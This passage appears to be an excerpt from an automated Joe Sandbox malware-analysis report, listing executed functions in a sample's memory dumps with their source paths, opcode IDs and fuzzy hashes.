                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d6c1f2a00b60af7f3e96cf397d8ad8234a23d8dd74b9aa99ac8b4c5233639ec7
                    • Instruction ID: 30463fb7bfb9c4b512ad0f9d62fe240f32766ec263851ee5595ecf5af819dba7
                    • Opcode Fuzzy Hash: d6c1f2a00b60af7f3e96cf397d8ad8234a23d8dd74b9aa99ac8b4c5233639ec7
                    • Instruction Fuzzy Hash: 4301DC31C48A4C8FCB54EF1AAC002D877B4FB9A318F00026AD44CD7180E3759A9ACB45
                    Function 00007FF848F310EA Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8304b697ef5cfb8e12454b9dfe7681862135819567abc9b7ee2ed61404d6c3ce
                    • Instruction ID: bbbe37285ffb19ffa4420ce6195e9bf2e2969118bc2c2eb8c7a26f5191e8e657
                    • Opcode Fuzzy Hash: 8304b697ef5cfb8e12454b9dfe7681862135819567abc9b7ee2ed61404d6c3ce
                    • Instruction Fuzzy Hash: FBE09236D0C94D4FEB91BF68A8076E5BBA4FB8A308F00007AE55CC3191C7259595C785

                    Executed Functions

                    Function 00007FF848F11EC3 Relevance: 15.3, Strings: 11, Instructions: 1538COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID: "$[$[$\$]$]$u${${$}$}
                    • API String ID: 0-3490533229
                    • Opcode ID: abb198e86f25a4a18597e6adefe790e2b307481c4697e20fbd74781d591b12b2
                    • Instruction ID: 851bcc98932eb530ccda7bdc357213c9580e943a3e7be0ce465660603272591c
                    • Opcode Fuzzy Hash: abb198e86f25a4a18597e6adefe790e2b307481c4697e20fbd74781d591b12b2
                    • Instruction Fuzzy Hash: 13D2B170D196298FDBA8EF28C8947A9B7B1FF58341F5041AAD00DE3291DB35AE81CF54
                    Function 00007FF848F2BD4E Relevance: 3.5, Strings: 2, Instructions: 964COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID: dM_H$|M_H
                    • API String ID: 0-1262879279
                    • Opcode ID: 5465f47349a317967e30e1150c5f29e6b4d15fa2317ccd5ca6e63a8240bf461f
                    • Instruction ID: c93bf2fa2ce2a642bf521cd0d30964468bcdd4f08aad0dfbb5e896971a688799
                    • Opcode Fuzzy Hash: 5465f47349a317967e30e1150c5f29e6b4d15fa2317ccd5ca6e63a8240bf461f
                    • Instruction Fuzzy Hash: 66626730D09A5D8FEBA5EB68D8557E8BBB1FF59340F0001BAD40DE3292DB396985CB40
                    Function 00007FF848F2367D Relevance: 1.8, Strings: 1, Instructions: 562COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID: M_H
                    • API String ID: 0-372873180
                    • Opcode ID: b85d5d82fab665eaf34476948f5aee5c55e78816a3454728916a5b1c793a315f
                    • Instruction ID: 7ceea922792a895841175b512f6fc5203294aaea5d194e23381edc9e4f3e2850
                    • Opcode Fuzzy Hash: b85d5d82fab665eaf34476948f5aee5c55e78816a3454728916a5b1c793a315f
                    • Instruction Fuzzy Hash: E1128C71D0D6198FEBA4EB28D845AE9B7F1FF54350F0001BAD40DE32A1DF39A9858B85
                    Function 00007FF848F1125C Relevance: 1.5, Strings: 1, Instructions: 273COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID: 0-3916222277
                    • Opcode ID: 054e95583f385b663bd5b7af194485f13caca81e9b229d7f021d7221cd174bc5
                    • Instruction ID: 85fa54d5a74158a66f368d61fa063dfe40bc5438283ddef87857dec03360a5fb
                    • Opcode Fuzzy Hash: 054e95583f385b663bd5b7af194485f13caca81e9b229d7f021d7221cd174bc5
                    • Instruction Fuzzy Hash: 3AA17174A18A1D8FDB98EF58C894BA8B7F1FF69301F5541A9D00DE72A5DB74AC81CB00
                    Function 00007FF848F17AD7 Relevance: .5, Instructions: 530COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e30678d1dfd800ae14aee6ea588496f77c3f1de7bafb69cc061518509c2fa219
                    • Instruction ID: 5a8d90fb36da7089d134d6b5ece14ede04bdb6be03b4ca47ddeab96fbc4d696c
                    • Opcode Fuzzy Hash: e30678d1dfd800ae14aee6ea588496f77c3f1de7bafb69cc061518509c2fa219
                    • Instruction Fuzzy Hash: 40F1EF30E1DA8A9FEB46EB6888566F9BBF0FF55340F4400BAD049D36D7DA286C41C785
                    Function 00007FF848F23D06 Relevance: .4, Instructions: 442COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b3e9889aeacbf194da52e7add69e508974c9ff1eb2179ae6c7295c8a23645cd8
                    • Instruction ID: 229b296ed6930d42ea2a93029532d07379eaca388b8eb24d1b20caac3946cb51
                    • Opcode Fuzzy Hash: b3e9889aeacbf194da52e7add69e508974c9ff1eb2179ae6c7295c8a23645cd8
                    • Instruction Fuzzy Hash: 19F1D770D09A2D8FDBA5EB18C895BA9B7B1FF68341F1001BAD40DE3291DF756A818F44
                    Function 00007FF848F2064A Relevance: .4, Instructions: 441COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ef1aeb4f708699c42b83f2e3f3c8d808d7c2588a10b579f4fe3fba3b5061a3a4
                    • Instruction ID: e55824eeb2445df19b6f666a2812fd0eb584d4b84eabbae0729021efb7d2db50
                    • Opcode Fuzzy Hash: ef1aeb4f708699c42b83f2e3f3c8d808d7c2588a10b579f4fe3fba3b5061a3a4
                    • Instruction Fuzzy Hash: C6F1CC319186568FEB49EF18D0E06B57BA1FF85340F5441BDC84BCB68ACB39E881CB85
                    Function 00007FF848F28908 Relevance: .4, Instructions: 392COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a050071feae25107340eb060343b6aa4fc6119f2d327764e8f39fa632e8ecbb8
                    • Instruction ID: 996bb19e72947a1011a52c2b3f52ec25d7244d64ca71680fd0ced2418fff60a3
                    • Opcode Fuzzy Hash: a050071feae25107340eb060343b6aa4fc6119f2d327764e8f39fa632e8ecbb8
                    • Instruction Fuzzy Hash: 1CD12331C0D68D8FEB65EF6888456E97BF0FF9A350F0401BBD049D72C2DB2868498B95
                    Function 00007FF848F2A96B Relevance: .4, Instructions: 358COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e348e2a4199a8b29839bf6eee47de007c4f1422b537c8c2dcae5d47021245375
                    • Instruction ID: 634f86d4846d835d7d3f0b397a93b8479ec289289ab6ad13adc7f60ad6b7aee8
                    • Opcode Fuzzy Hash: e348e2a4199a8b29839bf6eee47de007c4f1422b537c8c2dcae5d47021245375
                    • Instruction Fuzzy Hash: F7D1E330D1AA5D9FDB94EB68D885BACB7F1FF19341F5005A9D00DE7292DB39A980CB40
                    Function 00007FF848F19E38 Relevance: .3, Instructions: 281COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 28f1192ecbcc3e2b7ff05310378f440606a667b9f8c57114a845f33653b24c4e
                    • Instruction ID: 60634c20b9712a2a4690d5f13849a8cc0ef3249dd280e291d0aa177d1ed8e381
                    • Opcode Fuzzy Hash: 28f1192ecbcc3e2b7ff05310378f440606a667b9f8c57114a845f33653b24c4e
                    • Instruction Fuzzy Hash: 51917F30E19A4A9FEB84EBA8D856ABDBBB1FF58740F500079D009E36C6DF286C41C755
                    Function 00007FF848F23158 Relevance: .3, Instructions: 276COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7494912db488ff8e37579c5f6de793f86399a081f00f7ebf05e86aa4eacc23ee
                    • Instruction ID: 65e87826cd036dc177321df0fdffdc7e4033eb19371ee90979f9af562b487c13
                    • Opcode Fuzzy Hash: 7494912db488ff8e37579c5f6de793f86399a081f00f7ebf05e86aa4eacc23ee
                    • Instruction Fuzzy Hash: A3A1C370D09A1D8FDB98EF68D8947ADB7F1FB68341F5041AAD40DE3291CB75A981CB40
                    Function 00007FF848F17D10 Relevance: .3, Instructions: 263COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3f1c848c795d10605a732d106bd07874ca205dffa2de455f0c122b778d6d3335
                    • Instruction ID: 6471319e62299b50736238fedf1eddf8ca37b8906218f1f0f59db2e3b7d1ebd7
                    • Opcode Fuzzy Hash: 3f1c848c795d10605a732d106bd07874ca205dffa2de455f0c122b778d6d3335
                    • Instruction Fuzzy Hash: 6471C131E1CA0D8FEF59EB68D455AB977E1FB68750F40416AD00ED7295DF20AC428B84
                    Function 00007FF848F14555 Relevance: .2, Instructions: 237COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ca107e7e0c800a8bbb0ee294d5a61c71b45f1a673ef92990c29dfa68eb570c71
                    • Instruction ID: f0e4686fb27ae12bd12c48cd61b9b11206627500ce9db54eb7ef4956f5e6364c
                    • Opcode Fuzzy Hash: ca107e7e0c800a8bbb0ee294d5a61c71b45f1a673ef92990c29dfa68eb570c71
                    • Instruction Fuzzy Hash: 31916870D1DA5D8FEB94EF68D8586ADBBB1FF99340F1001BAD408E3292DB386844CB54
                    Function 00007FF848F21671 Relevance: .2, Instructions: 220COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 70e7d06eb44f1cf6fa8c8036662e91b2de10a9a7ef5b83eb56b9eb6b8af8593b
                    • Instruction ID: e248cc20644c2a385c1dc3f9f9074937089f8b67325490746d4d6e4da96be13d
                    • Opcode Fuzzy Hash: 70e7d06eb44f1cf6fa8c8036662e91b2de10a9a7ef5b83eb56b9eb6b8af8593b
                    • Instruction Fuzzy Hash: 5181B13090DB068FE368EB54E1905B1B7E1FF44350F64097DC48E87AD2CB2AB882CB49
                    Function 00007FF848F1B241 Relevance: .2, Instructions: 212COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fcc0b2fdf722388de5bc3f939a20b40eebbece532f0e0c0473b7aa2d630dde24
                    • Instruction ID: 3db81dbf7f334c57252bd0958957810b19b3041e76bb59ed4a580a480d7f157f
                    • Opcode Fuzzy Hash: fcc0b2fdf722388de5bc3f939a20b40eebbece532f0e0c0473b7aa2d630dde24
                    • Instruction Fuzzy Hash: 6A617D71C18A4D8FDB99EF64D8552EEBBB0FF59350F04017AE409D3282DB38A955CB80
                    Function 00007FF848F17A88 Relevance: .2, Instructions: 194COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9309dcd3cf016e3cbddedf650250e643ad754eb5e10f67b710bc9818a6c70bcc
                    • Instruction ID: b21686545b168a9c731f4ece2c7878ea214afca47cfd389d4491c8c5cdb0d9e1
                    • Opcode Fuzzy Hash: 9309dcd3cf016e3cbddedf650250e643ad754eb5e10f67b710bc9818a6c70bcc
                    • Instruction Fuzzy Hash: EC51AF31E1C94E8FEB98EB1889556BEB7E2FF98740F540169D00DE32C6CB286D01C759
                    Function 00007FF848F29E50 Relevance: .2, Instructions: 185COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a3e9081c8f155e1385924b26c051b49cf8374304a30f44051eeb8db3b1d30c9d
                    • Instruction ID: 05beb390ff0268e51ae5e3d9d4d043dc64f0876f068796066bdda431e99f0a99
                    • Opcode Fuzzy Hash: a3e9081c8f155e1385924b26c051b49cf8374304a30f44051eeb8db3b1d30c9d
                    • Instruction Fuzzy Hash: F151F471D1DA8E8FDB85EB68E8069F9BBF0FF49360F0401BAD408D3592CB3958858795
                    Function 00007FF848F19235 Relevance: .2, Instructions: 182COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a460c33dd04aaf8bc93469453000aa32ae5e21a56dda78b1029a823970a6b058
                    • Instruction ID: cc56e6bd5d55f447246ff40bd167dd3fbef50a3702372f9a1ae5db3c15103f91
                    • Opcode Fuzzy Hash: a460c33dd04aaf8bc93469453000aa32ae5e21a56dda78b1029a823970a6b058
                    • Instruction Fuzzy Hash: 39510332F0EAC54FE396A73C6814175BBA1EF557A0B4801FBD088C75DBD518AC0983DA
                    Function 00007FF848F23A2A Relevance: .2, Instructions: 176COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ac70754e8b07fd4f2681628f446625613525c1ae8b9ef281cb8dcd39671d0a3f
                    • Instruction ID: 622939967925035ab188ebf01b268239e412ccc2aa87242898916e3cd5cd3294
                    • Opcode Fuzzy Hash: ac70754e8b07fd4f2681628f446625613525c1ae8b9ef281cb8dcd39671d0a3f
                    • Instruction Fuzzy Hash: 8561F870D195298FEBA4EB18D89AAA8B7B1FF54341F1002F9D40DA32A1DF35AD858F41
                    Function 00007FF848F29ECA Relevance: .2, Instructions: 174COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 07430b409582765d2faaea2c472e1e27c8fed5b40689204b2a7bab2415d4e769
                    • Instruction ID: abb8cb13ff4169e52a1f41453f7faee3a9710d056e59750caccca1d167a2a35a
                    • Opcode Fuzzy Hash: 07430b409582765d2faaea2c472e1e27c8fed5b40689204b2a7bab2415d4e769
                    • Instruction Fuzzy Hash: 10510231D19A8D8FDB45EF68E8459EABBF0FF49360F0401BAE409D3192CB3968818751
                    Function 00007FF848F17E55 Relevance: .2, Instructions: 172COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b5ab31461bf367ad4802a2955234a734c5633f4d1bda08ec2c390b6d3f8c0685
                    • Instruction ID: e3f9a87ba949da140d664ebaed62d8626d383282515bc780392b8ad4a8a62248
                    • Opcode Fuzzy Hash: b5ab31461bf367ad4802a2955234a734c5633f4d1bda08ec2c390b6d3f8c0685
                    • Instruction Fuzzy Hash: 3051F231D0CA8E4FE785EB28D8142AA7BF1FF89350F0441BAD04DD32D6DB245D058782
                    Function 00007FF848F2CE8D Relevance: .2, Instructions: 166COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d80e3208dd2a4c4e2d2a2cf7ef3be091b735482ff2bd19abaf4f1ba539f6c7d3
                    • Instruction ID: ffd1a556fdadfcc6ff413b6a77b21b97fd684a034b4d316a63090962fbdb4b03
                    • Opcode Fuzzy Hash: d80e3208dd2a4c4e2d2a2cf7ef3be091b735482ff2bd19abaf4f1ba539f6c7d3
                    • Instruction Fuzzy Hash: 3C512634D0CA5D8FDB94EF68D494AACBBB1FF59340F500169D009E7296DB3AA881CB04
                    Function 00007FF848F10AB9 Relevance: .2, Instructions: 159COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: de2e33979cb4314679bfef6a64ab793f353e752808acc74915e966f3a9582d57
                    • Instruction ID: 012d94bb508c2f0d532880340ac8cb2a0652b7d0b208a198e25e2421215fc8f6
                    • Opcode Fuzzy Hash: de2e33979cb4314679bfef6a64ab793f353e752808acc74915e966f3a9582d57
                    • Instruction Fuzzy Hash: 7D51D870E18A5D8FDF98EF98C8996EDBBB1FFA8341F14012AD409E7295CB349845CB44
                    Function 00007FF848F17206 Relevance: .2, Instructions: 157COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5a0dd4c34f5358568ce591d4dfd1432e054d16db402c330b633748db03f00287
                    • Instruction ID: ef2289b1c67b8a204bcaebde58803392f9f8fcf2a7c7c8a8b27d582e43d1a274
                    • Opcode Fuzzy Hash: 5a0dd4c34f5358568ce591d4dfd1432e054d16db402c330b633748db03f00287
                    • Instruction Fuzzy Hash: 5A510471D0896E8EEBA4EB5898547F8B7A1FB68340F5041BAD00EE3285DF346D858B54
                    Function 00007FF848F23A49 Relevance: .2, Instructions: 154COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 78f1fd02b233b20db30ff434602f5215287122559420cd2dd7ca22449afbd5a0
                    • Instruction ID: 94e5964917ca8e992c51e3fe7948d7ce2b80d064bf00a204080e85eca4e862b7
                    • Opcode Fuzzy Hash: 78f1fd02b233b20db30ff434602f5215287122559420cd2dd7ca22449afbd5a0
                    • Instruction Fuzzy Hash: 3851B87091962D9FDFA4EB18D899AA8B7B1FF58741F1002A9D40DE32A5CF35AD81CF40
                    Function 00007FF848F25150 Relevance: .2, Instructions: 153COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: efb0e5bb4f9ef671ab290e6638023128e627f6da04c9ea1b576bcd51646c8d66
                    • Instruction ID: 6328ddf6ef61b06fb0d60406e65ae93e7846a1b7c0a5526ae3c27a9b8d13c161
                    • Opcode Fuzzy Hash: efb0e5bb4f9ef671ab290e6638023128e627f6da04c9ea1b576bcd51646c8d66
                    • Instruction Fuzzy Hash: 7C51B370E1891D8FDF98EF98D494AADBBB1FF68301F50016AD00DE7295DB35A881CB50
                    Function 00007FF848F11129 Relevance: .1, Instructions: 136COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c6c22dfbb1f70ac0d72b498ad1a020bc47c3ca055533e95d00ceda6df91e052a
                    • Instruction ID: c80a41b059bfbc03c97c92220ea5664e984a4ef242fb8f52d006c259ef234791
                    • Opcode Fuzzy Hash: c6c22dfbb1f70ac0d72b498ad1a020bc47c3ca055533e95d00ceda6df91e052a
                    • Instruction Fuzzy Hash: 9541C33190CA9D8FDB95EF68D8596E9BBF1FF69300F0400BAE408E7292CB345995C791
                    Function 00007FF848F2514A Relevance: .1, Instructions: 124COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 852e805a808fe77035ab3966811fee2ca416b919ca330d2319a34069d75be218
                    • Instruction ID: fb9d5d30f20b71a5fea04c34f67d4818f9ab73edb3219d6b7f71eafdb165c0b6
                    • Opcode Fuzzy Hash: 852e805a808fe77035ab3966811fee2ca416b919ca330d2319a34069d75be218
                    • Instruction Fuzzy Hash: 5041A370A18A5D8FDF94EF98D498AADBBF1FF68301F54006AD00DE7295DB74A980CB40
                    Function 00007FF848F11521 Relevance: .1, Instructions: 120COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ad2f0885124b4df47731431f6ed527fc8c0178c409955862e4f30f8a8e5bfe08
                    • Instruction ID: 4f5f67aa0fe19116667d4f4be1ed83b827f0af9d96e2c2f638db2a949ad38d79
                    • Opcode Fuzzy Hash: ad2f0885124b4df47731431f6ed527fc8c0178c409955862e4f30f8a8e5bfe08
                    • Instruction Fuzzy Hash: 9541E534A1891D8FDB98EB58C895BACB7F1FB58304F5440A9D04EE3692DF75AD818B40
                    Function 00007FF848F21D41 Relevance: .1, Instructions: 120COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b94ee479f0db3ceec4660b1e7537d5e0737656ae2d5950e0c63c104dbcf4ee3a
                    • Instruction ID: b714bbcbacb64d7da5a3476d07f4e9b2dbe062740def507feb5296e1a07e2b3a
                    • Opcode Fuzzy Hash: b94ee479f0db3ceec4660b1e7537d5e0737656ae2d5950e0c63c104dbcf4ee3a
                    • Instruction Fuzzy Hash: F0318131A0C949DFCB89EF28C495EA5B7E1FBA9310B0406ADD44AC7192CE25EC85CB85
                    Function 00007FF848F1D689 Relevance: .1, Instructions: 113COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e9b676ef90118c67767fc45a07af2154db6ad2fc2b9ab744c45ce68a5eb576f7
                    • Instruction ID: ff599ea702a4c9de8edf57a6be518f165647246bbdd61762ab1da3aea82d6406
                    • Opcode Fuzzy Hash: e9b676ef90118c67767fc45a07af2154db6ad2fc2b9ab744c45ce68a5eb576f7
                    • Instruction Fuzzy Hash: DB31B032E0D58A9EF229F72858511B97AB0EF423A0F1801BAD44B871C2DF4C3C41939A
                    Function 00007FF848F10AD0 Relevance: .1, Instructions: 113COMMON
                    Download Yara Rule
                    Memory Dump Source
